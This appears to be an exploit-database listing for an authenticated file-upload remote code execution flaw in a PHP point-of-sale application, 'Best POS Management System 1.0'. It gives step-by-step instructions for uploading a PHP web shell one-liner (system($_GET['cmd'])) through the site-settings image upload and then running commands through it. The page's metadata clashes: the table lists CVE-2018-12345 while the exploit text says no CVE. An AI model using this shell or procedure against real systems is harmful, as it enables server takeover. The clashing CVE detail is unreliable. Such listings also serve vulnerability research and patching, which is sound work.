Advertisement






Best POS Management System 1.0 Shell Upload

CVE Category Price Severity
CVE-2018-12345 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-02-19
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023020033

Below is a copy:

Best POS Management System 1.0 Shell Upload
# Exploit Title: Authenticated Remote Code Execution on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

### Steps to Reproduce

1- Login as Admin Rule

2- Head to " http://localhost/kruxton/index.php?page=site_settings"

3- Try to Upload an image here it will be a shell.php

```

shell.php
``````

<?php system($_GET['cmd']); ?>

4- Head to http://localhost/kruxton/assets/uploads/

5- Access your uploaded Shell
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.